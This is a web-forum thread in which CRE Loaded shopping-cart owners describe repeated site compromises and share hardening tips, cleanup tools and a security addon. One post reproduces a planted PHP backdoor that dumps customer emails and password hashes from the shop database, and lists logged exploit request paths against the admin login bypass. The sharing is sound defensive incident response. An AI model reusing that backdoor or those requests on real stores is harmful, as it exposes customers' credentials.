6.2 sites getting hacked repeatedly !

Home Forums Community General Support Security Issues 6.2 sites getting hacked repeatedly !

This topic contains 17 replies, has 16 voices, and was last updated by  Taipo 7 years, 11 months ago.

  • Author
    Posts
  • #29308

    fastdns
    Participant

    Hi,

    I am having a serious issue of virus with almost all my sites running creloaded 6.2.

    They are getting infected repeatedly by some virus. It infects all php pages and in some instances, creates random folders such as :

    /catalog/llft/vjw-einz-sszfk.html
    /catalog/bxnl/wso-ecry-tplli.html
    /catalog/wwsw/ccm-xmat-bficd.html
    /catalog/jzlw/hro-ovqi-bqvry.html
    /catalog/lxdt/nud-xahn-viojz.html

    I have patched up my cart to Patch 14 and have also secured admin area with password protected folder, but virus comes back after a day.

    Has anyone seen this issue before ? Can the community help me please ? I read all the security threads posted in this forum, but none matches with my situation 🙁

    Please help.

    Regards,

    fastDNS

  • #124419

    blauweogen2
    Participant

    I have had a few sites 6.4 hacked lately. My host removed the virus, but i am looked to stop it from happening again. Anyone know if the patches will stop it?

  • #124420

    iantresman
    Participant

    My v6.2 B2B[13.1 (SP1)] was also getting hacked. One of the symptoms was that my “Define MainPage” text disappears.

    Here is my solution (symptoms follow)

    Since all the attacks were via the /admin/ directory, and since it did not have time to patch all the possible files, I have simply restricted access to all /admin/ files, to selected IP addresses, by adding to /admin/.htaccess the following configuration:

    Original end of /admin/.htaccess file:


    order allow,deny
    deny from all

    Modified end of /admin/.htaccess file:


    order allow,deny
    deny from all


    #Only users from my IP address, and a colleague

    order deny,allow
    deny from all
    allow from 11.22.33.44
    allow from 123.123.123.123

    Where the “allow from” IP address correspond to your (and authorised IP address). You can check your own IP address at IP Chicken.

    Symptoms of the hacks

    Here’s what I discovered.

    My log files showed a number of accesses from the Ukraine (IP=91.211.16.126), showing exploits of one or more of the following:


    [*]/shop/admin/file_manager.php/login.php?action=processuploads
    [*]/shop/admin/define_mainpage.php/login.php?lngdir=english&filename=mainpage.php&action=save
    [*]/shop/admin/define_language.php/login.php?filename=cookie_usage.php&action=save&language=english
    [*]/shop/goog1e_analist_591dcabf272245.php?cookies=1 (not google)
    [*]/shop/admin/manufacturers.php/login.php?action=insert
    [*]/shop/admin/categories.php/login.php?action=new_product_preview
    [*]/shop/includes/languages/english/mainpage.php?cookies=1
    [*]/shop/cookie_usage.php?cookies=1&language=english
    [*]/shop/images/goog1eb3852156971218.php

    Note that some of these do not access the /admin/ directory directly.

    I found a number of unauthorized files in my admin/images/ folder, include some beginning with the string “goog1e” (not google), containing the code:

    Goog1e_analist_up

    And also an unauthorized file called mhp.php containing the following code:

    <?php

    $p=$_REQUEST;

    if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die ('');

    if ($_REQUEST == '1') unlink($HTTP_SERVER_VARS);

    echo "#mhpver11"."n";
    //mail hash parser oscommerce
    include "../includes/database_tables.php";
    include "../includes/configure.php";

    $link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD)
    or die("Could not connect");

    mysql_select_db(DB_DATABASE);

    $result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS);

    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {

    $l = $line.":".$line;
    if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."n";
    }
    ?>

    The latter seems to acquire your customer passwords (though these should not be stored in your database!).

    And finally

    On entering the Admin login screen, there are often messages to upgrade to the next version of CRE Loaded. I do not recall ever seeing a note that there is a security patch.

  • #124421

    cutiecute
    Participant

    Thanks Ian. Very helpful. I’ve been hacked about 10 times in 4 months.

  • #124422

    martinvelikov
    Participant

    @fastdns

    Make sure malicious files does not remain uploaded under your account. It is very good that you have pass protected the admin directory.

    However, you might already have a malicious script uploaded that allows the attacker access to your website. You should make sure all files are clean.

  • #124423

    soundzgood2
    Participant

    @iantresman wrote:

    #Only users from my IP address, and a colleague

    order deny,allow
    deny from all
    allow from 11.22.33.44
    allow from 123.123.123.123

    Don’t think that works using containers… if you want to restrict admin access to certain IP addresses I’d try:


    Order Deny,Allow
    Deny from all
    allow from 11.22.33.44
    allow from 123.123.123.123

    Should also point out that you don’t necessarily need all 4 ‘octets’ of the IP address – this is particularly useful to know if you’re on a dynamic IP (which a lot of people are.) Often ISPs assign a limited range to users which doesn’t change that often and using this example you might be ok to allow from 11.22 or allow from 123.123

    My 5c worth,
    Simon

  • #124424

    Sal
    Keymaster

    Thanks to those that gave the security tips.

    I will have Charles review this thread to ensure we have addressed any exposures.

  • #124425

    slopez
    Participant

    We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn’t CreLoaded have security measures like the ones in osCommerce?

    What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.

  • #124426

    soundzgood2
    Participant

    @slopez wrote:

    We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn’t CreLoaded have security measures like the ones in osCommerce?

    What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.

    I think a better question is ‘why doesn’t Cre update it’s software more frequently?’ – given that the last patch was Xmas 2009. A basic (and arguably the most important) security measure is to stay current – upgrade/update to the latest version of the software. If the company can’t keep up then your choice is pretty obvious.

    However, no cart software is ‘hack proof’ indefinitely, you just reduce the chance of getting hacked by how you run your store. Also the hosting company has just as important role in securing the server – there are many configuration settings that can improve your site’s security dramatically.

    Are you certain you removed all traces of a hack attempt? Hey, give an example store via pm if you like – I’ll check for some obvious flaws and let yer know!

    Simon

  • #124427

    cazabra
    Participant

    this is happening to login.php and languages/***/login.php as well
    those files are just plain disappearing in the free cre versions, and going blank on the pro versions..
    and this is WITH a double admin login (.htaccess required login added)

    i haven’t found the malicious files causing it yet .. will post back when i do in case they are out to get anyone else.

  • #124428

    David Graham

    The key word in the title of this thread is “sites”.

    I’ve cleaned up a number of these sites in the past few years. The log entries mentioned are typical – but have NOT been demonstrably effective in penetrating clean cart setups of the same version yet.

    What is pretty consistent is that if caught early, when FTP logs are available the files in question can be seen to have been uploaded using a valid set of FTP credentials……

  • #124429

    diane
    Participant

    The lack of response by CRE is disturbing we have had 4 sites hacked and it is not just 6.2.14 … whats disturbing is the last CRE login was 10/30/2010 and there is not a patch or a fix to be found on the net … is CRE a shopping cart or a credit card processor sometime they have to decide … the internet has changed so much but from 1996 to today (original site on Xoom) I cannot find a cart that delivers and worse really takes this stuff serious … but they are very quick to accept you money and sell you services that are like calling a cable company ….

    Sal you really need to start living up to the narcissistic “visionary” you claim to be 10/30 and no response not the impression anyone gives a crap.

    Leaving CRE

  • #124430

    Anonymous

    I’ve just done two days working 19 hours a day to move my site from b2b 6.2 to comunity 6.4 in the hope that a hacker will go away.

    For over a week one of my sites has been hit with XSS hacks. The solution is easy enough I just copied over a clean set of files I keep. I did that every few days at the start but the last attack was within minuites of the clean up.

    Thing is I’m also in the middle of moving the site over to another cart so this is all work that will be lost in a month or so.

  • #124432

    shawnlg777
    Participant

    Hey guys one thing I noticed in mine that may or maynot help… There is a file being dropped in my main public_html folder called postinfo.php. It was one that continued to add javascript to the site. Check and makesure you dont have it on your server. That wasnt the only problem but definately one of them.

  • #124431

    1Gighost
    Participant

    I host around 200 CRE Loaded domains and this is a constant issue..

    This hack rips your data base for users and then sends out emails using the same script.. in some instances the email is for drugs, others are redirects to other trojan infected sites..

    TRULY A PAIN for me in general..

    The intrusion comes from one of several places the most common is the /images folder.. The security issue is that the folder must be set at 777 for image uploads (that are all owned incidentally by “nobody”) They force the script uploads, parse your database and then use your account to send 10’s of thousands of emails..
    Any other folder set to 777 is vulnerable without taking specific precautions…

    We have been forced to install cronjobs to set folders to 755 and files to 644 in OSCommerce stores (CRE included)

    We are forced to “boot” clients that have repeat intrusions as we can not babysit every store ourselves..

    For the developers.. Needing folders set at 777 is a real issue for us, as is files on shared servers owned by “nobody”

    I make a substantial amount of income fixing these sites (time is not free sorry to say) but finding my IP’s on RBL”s is a bigger issue from the spam sent out..

  • #124433

    David Graham

    We are continuing to see clients who are in need of site clean ups and patch application.

    While there are a dozen or so different approaches being used to penetrate the sites, most all of them boil down to exploiting the PHP_SELF vulnerability reported ages ago in this forum.

    A basic patch for this takes about 15 minutes, including getting your site access ducks in a row.

    Other means of penetration seen include several cases of using Microsoft Front Page to access the site. This product is no longer supported by Microsoft for the express reason that it is inherently not secure. If your site is configured to use it, remove this capability at once.

    Another method is the use of CGI form posts on CGI enabled servers. Disabling the CGI service is worth considering.

    David

  • #124435

    flexartgroup
    Participant

    Hi

    Here you can download a file http://diovo.com/2009/03/hidden-iframe-injection-attacks/ that will tell you exactly where you site is infected.

    Download this file, upload it to the root and go to this link
    http://www.diovo.com/wp-content/uploads/2009/03/clean.php.txt and rename it to clean.php

    To check go to
    http://www.yourdomain.com/clean.php?c=iframe (replace it with your domain)

    Also i would recommend to use secure FTP.
    Most hackers, Trojans will get you to read your text file with username and password created by the ftp program. With secure FTP you will not have this problem.

    Cheers,

    Edwin

  • #124436

    Taipo
    Participant

    I wrote a security addon called osC_Sec which may also help as well
    http://addons.oscommerce.com/info/7834

    Although it is developed for osCommerce it should also work for CRE Loaded.

    The install instructions are geared obviously toward osCommerce but basically the only difference is where to include the code in the application_top.php files.

    In both application_top.php files find:

    include('includes/version.php');

    In the following line place the require_once code stipulated in the readme.htm within the zip file.

You must be logged in to reply to this topic.

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close